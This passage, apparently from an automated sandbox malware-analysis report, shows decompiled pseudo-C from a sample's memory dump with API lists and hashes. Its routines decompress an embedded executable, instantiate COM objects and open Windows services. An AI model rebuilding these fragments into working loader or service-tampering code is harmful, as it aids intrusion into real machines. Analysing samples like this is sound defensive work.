								if( *((intOrPtr*)( *((intOrPtr*)( *_t112 + 0x2c))))() >= 0) {
									_t115 = _v280;
									_push(_t115);
									if( *((intOrPtr*)( *((intOrPtr*)( *_t115 + 0x30))))() >= 0) {
										_t117 = _v280;
										_push(_t117);
										if( *((intOrPtr*)( *((intOrPtr*)( *_t117 + 0x2c))))() >= 0) {
											_t165 = 1;
										}
									}
								}
							}
						}
					}
					_t102 = _v248;
					 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 8))))(_t102);
					_t104 = _v240;
					 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 8))))(_t104);
				}
			}




















































                                                                                                        0x70986914
                                                                                                        0x70986918
                                                                                                        0x7098691e
                                                                                                        0x70986930
                                                                                                        0x70986934
                                                                                                        0x7098693c
                                                                                                        0x70986b62
                                                                                                        0x70986b62
                                                                                                        0x70986b6e
                                                                                                        0x70986b6e
                                                                                                        0x70986942
                                                                                                        0x7098694a
                                                                                                        0x70986951
                                                                                                        0x70986953
                                                                                                        0x70986954
                                                                                                        0x7098695a
                                                                                                        0x7098695b
                                                                                                        0x70986963
                                                                                                        0x70986b56
                                                                                                        0x70986b56
                                                                                                        0x70986b60
                                                                                                        0x00000000
                                                                                                        0x70986b60
                                                                                                        0x70986969
                                                                                                        0x70986971
                                                                                                        0x70986977
                                                                                                        0x70986978
                                                                                                        0x70986980
                                                                                                        0x70986b4a
                                                                                                        0x70986b4a
                                                                                                        0x70986b54
                                                                                                        0x00000000
                                                                                                        0x70986b54
                                                                                                        0x70986986
                                                                                                        0x70986990
                                                                                                        0x70986991
                                                                                                        0x70986999
                                                                                                        0x70986b3e
                                                                                                        0x70986b3e
                                                                                                        0x70986b48
                                                                                                        0x00000000
                                                                                                        0x70986b48
                                                                                                        0x7098699f
                                                                                                        0x709869a7
                                                                                                        0x709869af
                                                                                                        0x709869b4
                                                                                                        0x709869ba
                                                                                                        0x709869c2
                                                                                                        0x709869c3
                                                                                                        0x709869c7
                                                                                                        0x709869cf
                                                                                                        0x709869d4
                                                                                                        0x709869dc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709869e2
                                                                                                        0x709869ec
                                                                                                        0x709869ee
                                                                                                        0x709869ef
                                                                                                        0x709869f7
                                                                                                        0x70986b32
                                                                                                        0x70986b32
                                                                                                        0x70986b3c
                                                                                                        0x00000000
                                                                                                        0x70986b3c
                                                                                                        0x709869fd
                                                                                                        0x70986a05
                                                                                                        0x70986a0a
                                                                                                        0x70986a0e
                                                                                                        0x70986a14
                                                                                                        0x70986a15
                                                                                                        0x70986a1d
                                                                                                        0x70986a2a
                                                                                                        0x70986a36
                                                                                                        0x70986a41
                                                                                                        0x70986a45
                                                                                                        0x70986a4b
                                                                                                        0x70986a5d
                                                                                                        0x70986a62
                                                                                                        0x70986a6b
                                                                                                        0x70986a79
                                                                                                        0x70986a7b
                                                                                                        0x70986a85
                                                                                                        0x70986a86
                                                                                                        0x70986a8e
                                                                                                        0x70986a98
                                                                                                        0x70986aa0
                                                                                                        0x70986aa4
                                                                                                        0x70986aa9
                                                                                                        0x70986aaf
                                                                                                        0x70986ab7
                                                                                                        0x70986abf
                                                                                                        0x70986ac0
                                                                                                        0x70986ac8
                                                                                                        0x70986aca
                                                                                                        0x70986ad4
                                                                                                        0x70986ad5
                                                                                                        0x70986add
                                                                                                        0x70986adf
                                                                                                        0x70986ae9
                                                                                                        0x70986aea
                                                                                                        0x70986aeb
                                                                                                        0x70986af3
                                                                                                        0x70986af5
                                                                                                        0x70986afe
                                                                                                        0x70986b03
                                                                                                        0x70986b05
                                                                                                        0x70986b0e
                                                                                                        0x70986b13
                                                                                                        0x70986b15
                                                                                                        0x70986b15
                                                                                                        0x70986b13
                                                                                                        0x70986b03
                                                                                                        0x70986af3
                                                                                                        0x70986add
                                                                                                        0x70986ac8
                                                                                                        0x70986b1a
                                                                                                        0x70986b24
                                                                                                        0x70986b26
                                                                                                        0x70986b30
                                                                                                        0x70986b30

                                                                                                        APIs
                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,00000000), ref: 70986918
                                                                                                        • CoCreateInstance.OLE32(7098CF4C,00000000,00000001,7098D16C,?), ref: 70986934
                                                                                                        • RtlZeroMemory.NTDLL(?,00000020), ref: 70986A2A
                                                                                                        • StrChrW.SHLWAPI(7098CDB0,00000049,?,00000020), ref: 70986A36
                                                                                                        • VariantInit.OLEAUT32(?), ref: 70986A45
                                                                                                        • CoUninitialize.OLE32 ref: 70986B62
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CreateInitInitializeInstanceMemoryUninitializeVariantZero
                                                                                                        • String ID:
                                                                                                        • API String ID: 884428471-0
                                                                                                        • Opcode ID: 7ce313ee85df425a58b39ec01d8cb5c836df5000d83fe4c658977065ac72e497
                                                                                                        • Instruction ID: fa3edbac949eff7dfba01e0b27909fdf1832c8907574d510e6fb0bdba651038b
                                                                                                        • Opcode Fuzzy Hash: 7ce313ee85df425a58b39ec01d8cb5c836df5000d83fe4c658977065ac72e497
                                                                                                        • Instruction Fuzzy Hash: D471C5B5208702AFD200DF69C990E5BB7E9AFC8748F108A5DF549CB360D771E946CB62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70984D50, Relevance: 9.2, APIs: 6, Instructions: 192commemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 38%
                                                                                                        			E70984D50() {
				char _v4;
				char _v12;
				char _v16;
				intOrPtr _v32;
				intOrPtr* _v36;
				char _v40;
				char _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr* _v56;
				intOrPtr* _v60;
				intOrPtr _v64;
				intOrPtr* _v68;
				char _v72;
				intOrPtr* _v76;
				char _v80;
				intOrPtr* _v84;
				char _v88;
				intOrPtr* _v100;
				char _v104;
				intOrPtr* _v108;
				intOrPtr* _v124;
				intOrPtr _v128;
				intOrPtr* _v132;
				intOrPtr* _v136;
				intOrPtr _v140;
				intOrPtr* _v148;
				intOrPtr* _t67;
				intOrPtr* _t70;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t84;
				intOrPtr* _t87;
				intOrPtr* _t89;
				intOrPtr* _t94;
				intOrPtr* _t97;
				intOrPtr* _t99;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t108;
				intOrPtr* _t111;
				void* _t150;
				void* _t151;
				void* _t153;
				intOrPtr* _t154;
				void* _t156;
				intOrPtr _t157;
				intOrPtr* _t158;

				_t158 = __imp__CoCreateInstance;
				_push( &_v16);
				_push(0x7098d44c);
				_push(1);
				_push(0);
				_push(0x7098d48c);
				_v12 = 0;
				_v4 = 0;
				_v16 = 0;
				if( *_t158() < 0) {
					L26:
					return _v32;
				}
				_t67 = _v36;
				_v40 = 0;
				_push( &_v40);
				_push(_t67);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t67 + 0x1c))))() < 0) {
					L25:
					_t70 = _v44;
					 *((intOrPtr*)( *((intOrPtr*)( *_t70 + 8))))(_t70);
					if(_v36 != 0) {
						return 1;
					}
					goto L26;
				}
				_t73 = _v48;
				_v52 = 0;
				_push( &_v52);
				_push(_t73);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t73 + 0x1c))))() < 0) {
					L24:
					_t76 = _v56;
					 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 8))))(_t76);
					goto L25;
				} else {
					_t78 = _v60;
					_v44 = 0;
					_push( &_v44);
					_push(_t78);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t78 + 0x20))))() >= 0 && _v52 != 0) {
						_v48 = 1;
					}
					_t81 = _v68;
					_v72 = 0;
					_push( &_v72);
					_push(_t81);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t81 + 0x50))))() < 0) {
						L23:
						_t84 = _v76;
						 *((intOrPtr*)( *((intOrPtr*)( *_t84 + 8))))(_t84);
						goto L24;
					}
					_t154 = __imp__#2;
					_t151 =  *_t154(_v44, _t150, _t153);
					if(_t151 == 0) {
						L22:
						_t87 = _v84;
						 *((intOrPtr*)( *((intOrPtr*)( *_t87 + 8))))(_t87);
						goto L23;
					}
					_t89 = _v84;
					_push( &_v88);
					_v88 = 0;
					_push(_t151);
					_push(_t89);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t89 + 0x28))))() < 0) {
						if(_v64 != 0) {
							_t156 =  *_t154(_v56);
							if(_t156 != 0) {
								_push( &_v104);
								_push(0x7098d41c);
								_push(1);
								_push(0);
								_push(0x7098d46c);
								if( *_t158() >= 0) {
									_t94 = _v124;
									 *((intOrPtr*)( *((intOrPtr*)( *_t94 + 0x28))))(_t94, _t151);
									_t97 = _v132;
									 *((intOrPtr*)( *((intOrPtr*)( *_t97 + 0x20))))(_t97, _t156);
									_t99 = _v136;
									_push(_v140);
									_push(_t99);
									if( *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0x20))))() >= 0) {
										_v128 = 1;
									}
									_t102 = _v148;
									 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 8))))(_t102);
								}
								__imp__#6(_t156);
							}
						}
						L21:
						__imp__#6(_t151);
						goto L22;
					}
					_t157 = _v52;
					if(_t157 == 0) {
						_t108 = _v100;
						_v80 = 0;
						 *((intOrPtr*)( *((intOrPtr*)( *_t108 + 0x44))))(_t108,  &_v80);
						if(_v88 == 0) {
							_t111 = _v108;
							 *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0x48))))(_t111, 0xffffffff);
						}
					}
					_t104 = _v100;
					_v80 = 1;
					 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 8))))(_t104);
					if(_t157 != 0) {
						_t106 = _v100;
						 *((intOrPtr*)( *((intOrPtr*)( *_t106 + 0x24))))(_t106, _t151);
					}
					goto L21;
				}
			}






















































                                                                                                        0x70984d55
                                                                                                        0x70984d5f
                                                                                                        0x70984d60
                                                                                                        0x70984d67
                                                                                                        0x70984d69
                                                                                                        0x70984d6a
                                                                                                        0x70984d6f
                                                                                                        0x70984d73
                                                                                                        0x70984d77
                                                                                                        0x70984d7f
                                                                                                        0x70984f4d
                                                                                                        0x00000000
                                                                                                        0x70984f4d
                                                                                                        0x70984d85
                                                                                                        0x70984d8d
                                                                                                        0x70984d93
                                                                                                        0x70984d94
                                                                                                        0x70984d9c
                                                                                                        0x70984f36
                                                                                                        0x70984f36
                                                                                                        0x70984f40
                                                                                                        0x70984f4b
                                                                                                        0x70984f56
                                                                                                        0x70984f56
                                                                                                        0x00000000
                                                                                                        0x70984f4b
                                                                                                        0x70984da2
                                                                                                        0x70984daa
                                                                                                        0x70984db0
                                                                                                        0x70984db1
                                                                                                        0x70984db9
                                                                                                        0x70984f2a
                                                                                                        0x70984f2a
                                                                                                        0x70984f34
                                                                                                        0x00000000
                                                                                                        0x70984dbf
                                                                                                        0x70984dbf
                                                                                                        0x70984dc7
                                                                                                        0x70984dcd
                                                                                                        0x70984dce
                                                                                                        0x70984dd6
                                                                                                        0x70984ddf
                                                                                                        0x70984ddf
                                                                                                        0x70984de7
                                                                                                        0x70984def
                                                                                                        0x70984df5
                                                                                                        0x70984df6
                                                                                                        0x70984dfe
                                                                                                        0x70984f1e
                                                                                                        0x70984f1e
                                                                                                        0x70984f28
                                                                                                        0x00000000
                                                                                                        0x70984f28
                                                                                                        0x70984e09
                                                                                                        0x70984e13
                                                                                                        0x70984e17
                                                                                                        0x70984f10
                                                                                                        0x70984f10
                                                                                                        0x70984f1a
                                                                                                        0x00000000
                                                                                                        0x70984f1d
                                                                                                        0x70984e1d
                                                                                                        0x70984e25
                                                                                                        0x70984e26
                                                                                                        0x70984e2f
                                                                                                        0x70984e30
                                                                                                        0x70984e35
                                                                                                        0x70984e98
                                                                                                        0x70984ea1
                                                                                                        0x70984ea5
                                                                                                        0x70984eab
                                                                                                        0x70984eac
                                                                                                        0x70984eb1
                                                                                                        0x70984eb3
                                                                                                        0x70984eb4
                                                                                                        0x70984ebd
                                                                                                        0x70984ebf
                                                                                                        0x70984eca
                                                                                                        0x70984ecc
                                                                                                        0x70984ed7
                                                                                                        0x70984ed9
                                                                                                        0x70984ee3
                                                                                                        0x70984ee4
                                                                                                        0x70984eec
                                                                                                        0x70984eee
                                                                                                        0x70984eee
                                                                                                        0x70984ef6
                                                                                                        0x70984f00
                                                                                                        0x70984f00
                                                                                                        0x70984f03
                                                                                                        0x70984f03
                                                                                                        0x70984ea5
                                                                                                        0x70984f09
                                                                                                        0x70984f0a
                                                                                                        0x00000000
                                                                                                        0x70984f0a
                                                                                                        0x70984e37
                                                                                                        0x70984e3d
                                                                                                        0x70984e3f
                                                                                                        0x70984e47
                                                                                                        0x70984e52
                                                                                                        0x70984e59
                                                                                                        0x70984e5b
                                                                                                        0x70984e67
                                                                                                        0x70984e67
                                                                                                        0x70984e59
                                                                                                        0x70984e69
                                                                                                        0x70984e73
                                                                                                        0x70984e7b
                                                                                                        0x70984e7f
                                                                                                        0x70984e85
                                                                                                        0x70984e90
                                                                                                        0x70984e90
                                                                                                        0x00000000
                                                                                                        0x70984e7f

                                                                                                        APIs
                                                                                                        • CoCreateInstance.OLE32(7098D48C,00000000,00000001,7098D44C,?), ref: 70984D7B
                                                                                                        • SysAllocString.OLEAUT32(?), ref: 70984E11
                                                                                                        • SysAllocString.OLEAUT32(?), ref: 70984E9F
                                                                                                        • CoCreateInstance.OLE32(7098D46C,00000000,00000001,7098D41C,?), ref: 70984EB9
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 70984F03
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 70984F0A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: String$AllocCreateFreeInstance
                                                                                                        • String ID:
                                                                                                        • API String ID: 391255401-0
                                                                                                        • Opcode ID: dc9c5332f7d1fcc46e35c65f3815c756d083fc340b84ae6300ff46d1da082ef2
                                                                                                        • Instruction ID: b8ded13de83632c198dbe7331d2277e8668f9e70f6641c772e3cd326f34e95ed
                                                                                                        • Opcode Fuzzy Hash: dc9c5332f7d1fcc46e35c65f3815c756d083fc340b84ae6300ff46d1da082ef2
                                                                                                        • Instruction Fuzzy Hash: EB61BFB56043469FC700DFA9C980D2AB7E9BFC8208F10495DF69A8B391D771ED46CB62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709822F0, Relevance: 9.1, APIs: 6, Instructions: 84filememoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E709822F0(WCHAR* _a4, long* _a8) {
				long _v4;
				long _v8;
				void* _t21;
				long _t27;
				intOrPtr* _t30;
				void* _t33;

				_t21 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				if(_t21 == 0xffffffff) {
					return 0;
				} else {
					_t27 = GetFileSize(_t21, 0);
					if(_t27 == 0) {
						return 0;
					} else {
						_t33 = VirtualAlloc(0, _t27, 0x1000, 4);
						if(_t33 == 0) {
							L6:
							return 0;
						} else {
							_v4 = 0;
							ReadFile(_t21, _t33, _t27,  &_v4, 0);
							CloseHandle(_t21);
							_v8 = 0;
							_t30 = E70982220(_t33, _t27,  &_v8);
							VirtualFree(_t33, 0, 0x8000);
							if(_t30 == 0 ||  *_t30 != 0x5a4d) {
								goto L6;
							} else {
								 *_a8 = _v8;
								return _t30;
							}
						}
					}
				}
			}









                                                                                                        0x70982312
                                                                                                        0x70982317
                                                                                                        0x709823c5
                                                                                                        0x7098231d
                                                                                                        0x70982326
                                                                                                        0x7098232a
                                                                                                        0x709823bd
                                                                                                        0x70982330
                                                                                                        0x7098233f
                                                                                                        0x70982343
                                                                                                        0x709823ac
                                                                                                        0x709823b4
                                                                                                        0x70982345
                                                                                                        0x7098234f
                                                                                                        0x70982357
                                                                                                        0x7098235e
                                                                                                        0x7098236b
                                                                                                        0x70982383
                                                                                                        0x70982385
                                                                                                        0x7098238d
                                                                                                        0x00000000
                                                                                                        0x70982399
                                                                                                        0x709823a5
                                                                                                        0x709823ab
                                                                                                        0x709823ab
                                                                                                        0x7098238d
                                                                                                        0x70982343
                                                                                                        0x7098232a

                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 7098230C
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 70982320
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 70982339
                                                                                                        • ReadFile.KERNEL32 ref: 70982357
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 7098235E
                                                                                                          • Part of subcall function 70982220: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 7098224A
                                                                                                          • Part of subcall function 70982220: RtlDecompressBuffer.NTDLL(00000002,00000000,?,?,?,?), ref: 70982261
                                                                                                          • Part of subcall function 70982220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 70982275
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 70982385
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$File$AllocFree$BufferCloseCreateDecompressHandleReadSize
                                                                                                        • String ID:
                                                                                                        • API String ID: 3075244933-0
                                                                                                        • Opcode ID: e4921e73ccd6c12d66f2158f3593e22eb82fa617d4b9a0da7da187a78b384b96
                                                                                                        • Instruction ID: 6aac6570e908f1458465b0a3fe3e1c8d1f3b9607708639123f4aa01eef3d7af9
                                                                                                        • Opcode Fuzzy Hash: e4921e73ccd6c12d66f2158f3593e22eb82fa617d4b9a0da7da187a78b384b96
                                                                                                        • Instruction Fuzzy Hash: F02105762043106BD2105B69EC8CF8B7BACEBC5F62F60452AFD05D23C0D679990897B2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70982220, Relevance: 9.1, APIs: 6, Instructions: 79memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E70982220(void* _a4, long _a8, intOrPtr* _a12) {
				long _v4;
				long _v8;
				intOrPtr* _v22;
				long _v30;
				intOrPtr _v42;
				intOrPtr _t18;
				long _t34;
				void* _t35;
				void* _t36;
				void* _t37;

				_t37 = _a4;
				_t34 = _a8;
				_v8 = 0;
				_v4 = 0;
				do {
					_t36 = VirtualAlloc(0, _t34, 0x1000, 4);
					if(_t36 == 0) {
						goto L4;
					} else {
						if(RtlDecompressBuffer(2, _t36, _t34, _t37, _a8,  &_v8) != 0xc0000242) {
							_t35 = VirtualAlloc(0, _v30, 0x1000, 4);
							if(_t35 == 0) {
								break;
							} else {
								RtlMoveMemory(_t35, _t36, _v30);
								VirtualFree(_t36, 0, 0x8000);
								 *_v22 = _v42;
								return _t35;
							}
						} else {
							VirtualFree(_t36, 0, 0x8000);
							_t34 = _t34 + _t34;
							goto L4;
						}
					}
					L8:
					L4:
					_t18 = _v4 + 1;
					_v4 = _t18;
				} while (_t18 < 0x1e);
				 *_a12 = _v8;
				return 0;
				goto L8;
			}













                                                                                                        0x7098222b
                                                                                                        0x70982233
                                                                                                        0x70982237
                                                                                                        0x7098223b
                                                                                                        0x70982240
                                                                                                        0x7098224c
                                                                                                        0x70982250
                                                                                                        0x00000000
                                                                                                        0x70982252
                                                                                                        0x7098226b
                                                                                                        0x709822af
                                                                                                        0x709822b3
                                                                                                        0x00000000
                                                                                                        0x709822b5
                                                                                                        0x709822bc
                                                                                                        0x709822c9
                                                                                                        0x709822d7
                                                                                                        0x709822e2
                                                                                                        0x709822e2
                                                                                                        0x7098226d
                                                                                                        0x70982275
                                                                                                        0x7098227b
                                                                                                        0x00000000
                                                                                                        0x7098227b
                                                                                                        0x7098226b
                                                                                                        0x00000000
                                                                                                        0x7098227d
                                                                                                        0x70982281
                                                                                                        0x70982282
                                                                                                        0x70982286
                                                                                                        0x70982296
                                                                                                        0x7098229e
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 7098224A
                                                                                                        • RtlDecompressBuffer.NTDLL(00000002,00000000,?,?,?,?), ref: 70982261
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 70982275
                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 709822AD
                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 709822BC
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?), ref: 709822C9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$AllocFree$BufferDecompressMemoryMove
                                                                                                        • String ID:
                                                                                                        • API String ID: 201667072-0
                                                                                                        • Opcode ID: ad3133479b4f5e8a56f2b82fd2ebc97513938dfa3f830d298ab3550ab42e1820
                                                                                                        • Instruction ID: c0dcc6a8adc3de2b42206a41f1609db78e9f6ae752e152fe92648983f6a7e0b4
                                                                                                        • Opcode Fuzzy Hash: ad3133479b4f5e8a56f2b82fd2ebc97513938dfa3f830d298ab3550ab42e1820
                                                                                                        • Instruction Fuzzy Hash: A7214C722483016FD210DE19DC85F5BB7E9FBC9B11F54092DF655D7380D660E90887A6
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70985500, Relevance: 9.1, APIs: 6, Instructions: 67COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 43%
                                                                                                        			E70985500(signed short _a4) {
				char _v1564;
				short _v1572;
				void* _t5;
				intOrPtr _t6;
				intOrPtr _t8;
				intOrPtr _t17;
				signed short _t19;

				_t19 = _a4;
				if(_t19 != 0x65 ||  *0x7098f2ac >= 6 &&  *0x7098f5f4 == 0 &&  *0x7098f5f8 != 0) {
					_t5 = OpenEventW(2, 0, StrChrW(0x7098cad4, 0x54));
					if(_t5 == 0) {
						_t6 =  *0x7098f5e0; // 0xb52c80
						_t17 =  *0x7098f5d4; // 0xb7c4e8
						_push(_t6);
						_push(_t19 & 0x0000ffff);
						_push(0x191);
						_push(_t17);
						_push(StrChrW(0x7098c514, 0x72));
						_t8 =  *0x7098f578; // 0xb63c90
						_push(_t8);
						wsprintfW( &_v1572, StrChrW(0x7098caa0, 0x22));
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						return E70985220( &_v1564, 1, 0);
					} else {
						CloseHandle(_t5);
						return 0;
					}
				} else {
					return 0;
				}
			}










                                                                                                        0x70985507
                                                                                                        0x70985513
                                                                                                        0x7098554f
                                                                                                        0x70985557
                                                                                                        0x7098556b
                                                                                                        0x70985570
                                                                                                        0x70985576
                                                                                                        0x7098557a
                                                                                                        0x7098557b
                                                                                                        0x70985580
                                                                                                        0x7098558a
                                                                                                        0x7098558b
                                                                                                        0x70985590
                                                                                                        0x709855a0
                                                                                                        0x709855a6
                                                                                                        0x709855a8
                                                                                                        0x709855aa
                                                                                                        0x709855ac
                                                                                                        0x709855c7
                                                                                                        0x70985559
                                                                                                        0x7098555a
                                                                                                        0x7098556a
                                                                                                        0x7098556a
                                                                                                        0x70985530
                                                                                                        0x70985539
                                                                                                        0x70985539

                                                                                                        APIs
                                                                                                        • StrChrW.SHLWAPI(7098CAD4,00000054), ref: 70985548
                                                                                                        • OpenEventW.KERNEL32(00000002,00000000,00000000), ref: 7098554F
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 7098555A
                                                                                                        • StrChrW.SHLWAPI(7098C514,00000072,00B7C4E8,00000191,?,00B52C80), ref: 70985588
                                                                                                        • StrChrW.SHLWAPI(7098CAA0,00000022,00B63C90,00000000,?,00B52C80), ref: 70985598
                                                                                                        • wsprintfW.USER32 ref: 709855A0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CloseEventHandleOpenwsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 3063877008-0
                                                                                                        • Opcode ID: b8a4d73267cb21f81cab20ab9f8a6fa10ce5cbe489804dd792d3cbdd6bdb4458
                                                                                                        • Instruction ID: 791ca8affe2b04ea0aa39224b75e1daa7f9bb0d752ee224e3bbe142ae8b35dd5
                                                                                                        • Opcode Fuzzy Hash: b8a4d73267cb21f81cab20ab9f8a6fa10ce5cbe489804dd792d3cbdd6bdb4458
                                                                                                        • Instruction Fuzzy Hash: F41136B36243007EF6209B66DC19FEB37AEE784705F90002AF505823E0E6745444D7A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709839F0, Relevance: 9.1, APIs: 6, Instructions: 63serviceCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 94%
                                                                                                        			E709839F0(short* _a4, short** _a8, int _a12, signed int _a16) {
				short* _t5;
				void* _t14;
				int _t19;
				void* _t24;
				void* _t25;
				signed int _t27;

				_t19 = 0;
				_t5 = OpenSCManagerW(0, 0, 0xf003f);
				_t25 = _t5;
				if(_t25 != 0) {
					L2:
					_t27 = _a16;
					asm("sbb eax, eax");
					_t24 = OpenServiceW(_t25, _a4, ( ~_t27 & 0xfff0fe05) + 0xf01ff);
					if(_t24 == 0) {
						L6:
						CloseServiceHandle(_t25);
						goto L7;
					} else {
						if(_t27 != 0) {
							_t19 = 1;
							goto L6;
						} else {
							_t14 = E70983920(_t24, _a8, _a12);
							CloseServiceHandle(_t24);
							CloseServiceHandle(_t25);
							return _t14;
						}
					}
				} else {
					_t25 = OpenSCManagerW(_t5, _t5, 1);
					if(_t25 == 0) {
						L7:
						return _t19;
					} else {
						goto L2;
					}
				}
			}









                                                                                                        0x709839fe
                                                                                                        0x70983a02
                                                                                                        0x70983a04
                                                                                                        0x70983a08
                                                                                                        0x70983a16
                                                                                                        0x70983a1b
                                                                                                        0x70983a23
                                                                                                        0x70983a38
                                                                                                        0x70983a3c
                                                                                                        0x70983a71
                                                                                                        0x70983a72
                                                                                                        0x00000000
                                                                                                        0x70983a3e
                                                                                                        0x70983a40
                                                                                                        0x70983a6c
                                                                                                        0x00000000
                                                                                                        0x70983a42
                                                                                                        0x70983a4d
                                                                                                        0x70983a58
                                                                                                        0x70983a5f
                                                                                                        0x70983a6b
                                                                                                        0x70983a6b
                                                                                                        0x70983a40
                                                                                                        0x70983a0a
                                                                                                        0x70983a10
                                                                                                        0x70983a14
                                                                                                        0x70983a7b
                                                                                                        0x70983a7e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70983a14

                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000,00000000,00000000,7098758A,0079A25C,00000000,00000000,00000001,?,00000000), ref: 70983A02
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 70983A0E
                                                                                                        • OpenServiceW.ADVAPI32(00000000,?,?,750D2940), ref: 70983A32
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000000), ref: 70983A58
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 70983A5F
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 70983A72
                                                                                                        Memory Dump Source
